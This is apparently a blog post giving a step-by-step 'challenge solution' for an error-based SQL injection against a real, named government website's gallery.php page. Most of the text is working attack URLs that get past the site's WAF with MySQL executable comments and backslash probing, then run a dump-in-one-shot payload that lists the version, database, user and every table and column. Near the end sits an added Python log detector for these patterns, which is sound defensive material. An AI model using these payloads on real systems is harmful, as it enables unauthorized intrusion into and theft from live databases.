Sunday, January 3, 2016

SQLi Challenge Solution 3

So, first of all, hello guys ^_^ as always :p

My tasks and rules were these...

As you know, MySQL union-based injection will not work here.

Now we'll think about error-based injection, but sadly some words in that query are not allowed under my rules.

XPath injection would work, but it's not good for DIOS: it shows less data, and polygon injection shows only a bit more than XPath.

For this challenge, Dual injection is best: it shows more data than any of these injections.

The Dual injection query is this:

and(select(!dark-~007)from(select (@@version) dark)angel)--+-

So, let's start...

1. We'll check whether the website is vulnerable or not.

http://bpc.gov.bd/gallery.php?id=6' > error

2. Now we'll check which comment sequence works.

http://bpc.gov.bd/gallery.php?id=6'--+- > No error, which means this comment works ^_^

3. We'll execute the Dual injection query.

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@version) dark)angel)--+- > WAF -_-

4. We'll bypass the WAF. We'll put a \ inside keywords to find out which word is blocked.

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@ver\sion) dark)angel)--+- > no error, which means "version" is blocked

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (/*!50000@@version*/) dark)angel)--+- > :) Bypassed...

5. First we'll print the cyber name, version, database and user in the DIOS...

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat(/*!50000@@version*/,database(),user()) dark)angel)--+- > Again WAF -_-

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (c\oncat(/*!50000@@version*/,dat\abase(),us\er()) dark)angel)--+- > no error, now time to bypass these words

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (/*!50000@@version*/,/*!50000database*/(),/*!50000user*/())) dark)angel)--+-

Now we'll add the cyber name, the "Version ::", "Database ::" and "User ::" labels, and <br> tags, all as hex strings:

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e)) dark)angel)--+- > Done! Printed.

6. Now we'll dump tables and columns to complete the DIOS...

To dump tables and columns I'll use this query:

(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x)


http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x))) dark)angel)--+- > Blocked by WAF

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) fr\om(select(@:=0x00),(select(0) fro\m(info\rmation_schema.columns)wh\ere(ta\ble_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,ta\ble_name,0x203a3a20,colu\mn_name))))x))) dark)angel)--+- > No error, now time to bypass these words

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) /*!50000from*/(select(@:=0x00),(select(0) /*!50000from*/(/*!50000information_schema*/.columns)/*!50000where*/(/*!50000table_schema*/!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))) dark)angel)--+- > DIOS Bypassed :D
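From the defender's side, everything the WAF missed in steps 3 to 6 is easy to spot in access logs once a request is URL-decoded and the MySQL executable comments (/*!50000...*/) are collapsed back to the keyword they hide. The detector below is an added example written for this page, not the author's code; the sample query strings are constructed and all names (normalize, analyze, is_suspicious, the indicator labels) are my own:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request paths (not real traffic from any site).
SAMPLE_REQUESTS = [
    "/gallery.php?id=6",
    "/gallery.php?id=6%27--+-",
    "/gallery.php?id=6%27+and(select(!dark-~007)from(select+(@@ver%5Csion)+dark)angel)--+-",
    "/gallery.php?id=6%27+and(select(!dark-~007)from(select+(concat(/*!50000@@version*/,"
    "/*!50000database*/(),/*!50000user*/()))+dark)angel)--+-",
    "/search.php?q=mysql+version+and+user+guide",
]

# MySQL executable comment: /*!50000keyword*/ is run by MySQL as plain "keyword".
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.S)

# Matched against the decoded, comment-collapsed, lowercased query string.
INDICATORS = {
    "comment_terminator": re.compile(r"--\s"),                    # '--+-' after decoding
    "negation_overflow": re.compile(r"select\(\s*!\w+\s*-\s*~"),  # select(!x-~0) Dual form
    "env_probe": re.compile(r"@@version|\bdatabase\(\)|\buser\(\)"),
    "keyword_backslash_probe": re.compile(r"[a-z]\\[a-z]"),       # ver\sion style probing
    "information_schema": re.compile(r"information_schema\.(columns|tables)"),
    "user_var_concat": re.compile(r"@\s*:=\s*concat"),            # @:=concat(@,...) DIOS loop
}

def normalize(query: str) -> str:
    """URL-decode, then collapse version comments so /*!50000database*/ reads as database."""
    return VERSION_COMMENT.sub(r"\1", unquote_plus(query)).lower()

def analyze(query: str) -> list[str]:
    """Return the names of every indicator present in one request query string."""
    hits = []
    if VERSION_COMMENT.search(unquote_plus(query)):   # flag the obfuscation itself
        hits.append("mysql_version_comment")
    normalized = normalize(query)
    hits += [name for name, pat in INDICATORS.items() if pat.search(normalized)]
    return hits

def is_suspicious(query: str) -> bool:
    """A lone '-- ' can be benign; two or more independent indicators is a strong signal."""
    return len(analyze(query)) >= 2

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print("ALERT" if is_suspicious(req) else "ok   ", req, analyze(req))
```

Collapsing the executable comments before matching is the step a keyword blocklist WAF skipped here; the same normalization applies to /*!50000from*/ and /*!50000information_schema*/ in the final DIOS request.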


Challenge solved!

Happy Injecting....

#D4RK_4NG31